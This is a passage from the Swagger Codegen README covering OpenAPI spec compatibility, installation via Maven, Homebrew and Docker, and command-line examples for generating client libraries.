server](#generating-libraries-from-your-server)\n - [Modifying the client library format](#modifying-the-client-library-format)\n - [Making your own codegen modules](#making-your-own-codegen-modules)\n - [Where is Javascript???](#where-is-javascript)\n - [Generating a client from local files](#generating-a-client-from-local-files)\n - [Customizing the generator](#customizing-the-generator)\n - [Validating your OpenAPI Spec](#validating-your-openapi-spec)\n - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)\n - [Generating static html api documentation](#generating-static-html-api-documentation)\n - [To build a server stub](#to-build-a-server-stub)\n - [To build the codegen library](#to-build-the-codegen-library)\n - [Workflow Integration](#workflow-integration)\n - [Github Integration](#github-integration)\n - [Online Generators](#online-generators)\n - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)\n - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)\n - [Swagger Codegen Core Team](#swagger-codegen-core-team)\n - [Swagger Codegen Evangelist](#swagger-codegen-evangelist)\n - [License](#license)\n\n\n## Compatibility\nThe OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:\n\nSwagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes\n-------------------------- | ------------ | -------------------------- | -----\n2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes\n2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes\n[2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)\n[2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)\n[2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)\n2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)\n1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)\n\n\n### Prerequisites\nIf you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum):\n\n```\nwget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar\n\njava -jar swagger-codegen-cli.jar help\n```\n\nOn a mac, it's even easier with `brew`:\n```\nbrew install swagger-codegen\n```\n\nTo build from source, you need the following installed and available in your $PATH:\n\n* [Java 7 or 8](http://java.oracle.com)\n\n* [Apache maven 3.3.3 or greater](http://maven.apache.org/)\n\n#### OS X Users\nDon't forget to install Java 7 or 8. You probably have 1.6.\n\nExport JAVA_HOME in order to use the supported Java version:\n```\nexport JAVA_HOME=`/usr/libexec/java_home -v 1.8`\nexport PATH=${JAVA_HOME}/bin:$PATH\n```\n\n### Building\n\nAfter cloning the project, you can build it from source with this command:\n```\nmvn clean package\n```\n\n### Homebrew\n\nTo install, run `brew install swagger-codegen`\n\nHere is an example usage:\n```\nswagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/\n```\n\n### Docker\n\n#### Development in docker\n\nYou can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`\nin the docker container. It also maps `~/.m2/repository` to the appropriate container location.\n\nTo execute `mvn package`:\n\n```\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\n./run-in-docker.sh mvn package\n```\n\nBuild artifacts are now accessible in your working directory.\n\nOnce built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:\n\n```\n./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli\n./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli\n./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client\n./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \\\n -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore\n```\n\n#### Run Docker in Vagrant\nPrerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).\n ```\ngit clone http://github.com/swagger-api/swagger-codegen.git\ncd swagger-codegen\nvagrant up\nvagrant ssh\ncd /vagrant\n./run-in-docker.sh mvn package\n ```\n\n#### Public Pre-built Docker images\n\n - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)\n - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)\n\n\n##### Swagger Generator Docker Image\n\nThe Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.\n\nExample usage (note this assumes `jq` is installed for command line processing of JSON):\n\n```\n# Start container and save the container id\nCID=$(docker run -d swaggerapi/swagger-generator)\n# allow for startup\nsleep 5\n# Get the IP of the running container\nGEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)\n# Execute an HTTP request and store the download link\nRESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{\n \"swaggerUrl\": \"http://petstore.swagger.io/v2/swagger.json\"\n}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '\"')\n# Download the generated zip and redirect to a file\ncurl $RESULT > result.zip\n# Shutdown the swagger generator image\ndocker stop $CID && docker rm $CID\n```\n\nIn the example above, `result.zip` will contain the generated client.\n\n##### Swagger Codegen CLI Docker Image\n\nThe Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.\n\nTo generate code with this image, you'll need to mount a local location as a volume.\n\nExample:\n\n```\ndocker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l go \\\n -o /local/out/go\n```\n\nThe generated code will be located under `./out/go` in the current directory.\n\n## Getting Started\n\nTo generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following\n```sh\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\nmvn clean package\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l php \\\n -o /var/tmp/php_api_client\n```\n(if you're on Windows, replace the last command with `java -jar modules\\swagger-codegen-cli\\target\\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\\temp\\php_api_client`)\n\nYou can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar)\n\nTo get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`\n\nTo get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`\n\n## Generators\n\n### To generate a sample client library\nYou can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:\n\n```\n./bin/java-petstore.sh\n```\n\n(On Windows, run `.\\bin\\windows\\java-petstore.bat` instead)\n\nThis will run the generator with this command:\n\n```\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l java \\\n -o samples/client/petstore/java\n```\n\nwith a number of options. You can get the options with the `help generate` command (below only shows partal results):\n\n```\nNAME\n swagger-codegen-cli generate - Generate code with chosen lang\n\nSYNOPSIS\n swagger-codegen-cli generate\n [(-a | --auth )]\n [--additional-properties ]\n [--api-package ] [--artifact-id ]\n [--artifact-version ]\n [(-c | --config )]\n [-D ] [--group-id ]\n (-i | --input-spec )\n [--import-mappings ]\n [--instantiation-types ]\n [--invoker-package ]\n (-l | --lang )\n [--language-specific-primitives ]\n [--library ] [--model-package ]\n [(-o | --output )]\n [(-s | --skip-overwrite)]\n [(-t